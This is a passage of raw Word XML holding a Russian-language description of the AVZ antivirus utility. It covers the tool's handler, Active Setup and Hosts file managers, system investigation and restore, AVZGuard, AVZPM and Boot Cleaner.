        <w:t>грамм, вызванных установкой в систему некоторых перехватчиков - он показ</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ы</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вает все внедренные DLL, в то время как искатель троянских DLL и кейлогг</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ров отображает только подозрительные. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Менеджер обладает типовой для остальных менеджеров AVZ функци</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>нальностью - карантин отдельного файла или всех неопознанных файлов, с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>хранение HTML протокола.</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Менеджер протоколов и обработчиков</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протоколов и обработчиков отображает список модулей, зар</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">гистрированных в системе в качестве обработчиков для протоколов (например, AP GZIP Encoding/Decoding Filter) и обработчиков (Handler-s), например ftp: Asychronous Pluggable Protocol Handler или http: Asychronous Pluggable Protocol Handler).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lastRenderedPageBreak/>
        <w:t>Отображать список модулей, зарегистрированных в качестве обр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ботчиков;</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Временно отключать любой из обработчиков;</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Удалять обработчики (при этом исполняемый файл не удаляется - удаляется только регистрационная информация в реестре);</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 (возможно автоматическое копир</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вание всех неопознанных файлов);</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протоколов и обработчиков подключен к исследованию с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>стемы и автокарантину.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rStyle w:val="fheading1"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="fheading1"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Менеджер Active Setup</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Active Setup отображает список приложений, зарегистрир</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ванных в качестве Active Setup инсталляций. Известен ряд вредоносных пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>грамм, применяющих регистрацию в Active Setup для скрытного автозапуска.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список приложений, зарегистрированных в Active Setup;</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Временно отключать любое из приложений;</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Удалять записи Active Setup  (при этом исполняемый файл не уд</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ляется - удаляется только регистрационная информация в реестре);</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 (возможно автоматическое копир</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вание всех неопознанных файлов);</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Active Setup подключен к исследованию системы и авток</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>рантину.</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Менеджер файла Hosts</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файла Hosts позволяет просмотреть содержимое файла Hosts  с возможностью удаления любой из его строк. Кроме удаления строк файла Hosts предусмотрена кнопка очистки данного файла, которая оставляет в файле тол</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ь</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ко одну строку "127.0.0.1 localhost", что полезно для оперативной чистки да</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ного файла после его повреждения троянскими программами.</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менеджера файла Hosts подключен к исследованию системы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Общие ресурсы и сетевые сеансы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Данный менеджер выполняет функции, аналогичные штатной системной утилите "Инспектор сети". В окне менеджера имеется три закладки - "Общие ресурсы", "Сетевые сеансы" и "Открытые файлы". Информация на данных з</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>кладках обновляется автоматически с интервалом 2 секунды.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Функции анализа и восстановления </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1. Исследование системы - это функция, позволяющая изучить систему и сформировать HTML протокол, позволяющий обнаружить подозрительные файлы и программы. Исследование системы может применяться для  операти</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ного изучения системы и (или) последующей отправки протокола для анализа в конференции вирусологов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Запуск исследования системы производится из меню "Файл / Исследов</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ние системы", при выполнении которого выводится диалоговое окно исслед</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вания системы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2. Восстановление системы - это особая функция AVZ,  которая позволяет восстановить ряд системных настроек, поврежденных вредоносными програ</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>м</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>мами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Микропрограммы восстановления системы хранятся в антивирусной базе и обновляются по мере необходимости.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3. Стандартные скрипты предназначены для автоматизации основных операций, выполняемых при помощи AVZ. Они хранятся в базе AVZ и обно</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ляются при помощи автоматического обновления.  Вызов окна "Стандартные скрипты" производится из меню "Файл/Стандартные скрипты".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4. Мастер поиска и устранения проблем предназначен для автоматическ</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>го анализа системы, обнаружения устранимых ошибок и аномалий и их устр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>нения. Мастер во многом аналогичен восстановлению системы AVZ, его гла</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ное отличие от восстановления состоит в том, что он автоматически ищет пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">блемы (в восстановлении системы пользователь должен сам принять решение о том, какие функции восстановления задействовать) и производит более точное и гибкое устранение проблем. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Вызов мастера осуществляется из меню "Файл\Мастер поиска и устран</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ния проблем".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Подсистема AVZGuard</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Основным назначением системы является:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Борьба с трудноудалимыми троянским программами, которые во</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>станавливают ключи реестра и удаленные файлы, запускают остановленные процессы или иными способами препятствуют  своему удалению. Это основное назначение системы;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Защита доверенных приложений от недоверенных. Позволяет з</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>щитить AVZ и запущенные им доверенные приложения от воздействия раб</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тающих вредоносных программ;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Распространение действия антируткита UserMode AVZ на другие процессы. Пример - утилиты типа VBA Console scanner, DrWeb Cure IT, HijackThis и т.п. не обладают функциями детектирования и нейтрализации ру</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>китов. В этом случае можно запустить AVZ, провести нейтрализацию руткитов для его процесса, а затем включить AVZGuard и запустить тот-же DrWeb Cure IT как доверенное приложение. В этом случае драйвер AVZGuard возьмет на себя функцию защиты запущенного процесса, и в том числе не позволит рутк</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ту модифицировать его. Естественно, данная технология не является панацеей от всех видов UserMode руткитов, но основные их типы (в частности Hacker Defender) могут быть нейтрализованы подобным образом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="western"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Подсистема AVZPM</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Технология AVZPM основана на KernelMode Boot драйвере, который осуществляет слежение за запуском процессов и загрузкой драйверов. Драйвер написан в строгом соответствии с MSDN и рекомендациями Microsoft для м</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>нимизации его воздействия на систему и снижения вероятности конфликта с другим антивирусным программным обеспечением.</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bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Назначение:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="western"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Мониторинг запуска/остановки процессов;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="western"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Мониторинг загрузки/выгрузки драйверов;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="western"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Ведение списков процессов и загруженных модулей пространства ядра, независимых от системных.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="western"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Подсистема Boot Cleaner</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Технология Boot Cleaner основана на KernelMode Boot драйвере, который выполняет заданную последовательность операций в момент загрузки системы. После выполнения заданных операций драйвер автоматически самоуничтож</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ется. Основное назначение - борьба с трудноудалимыми вредоносными пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
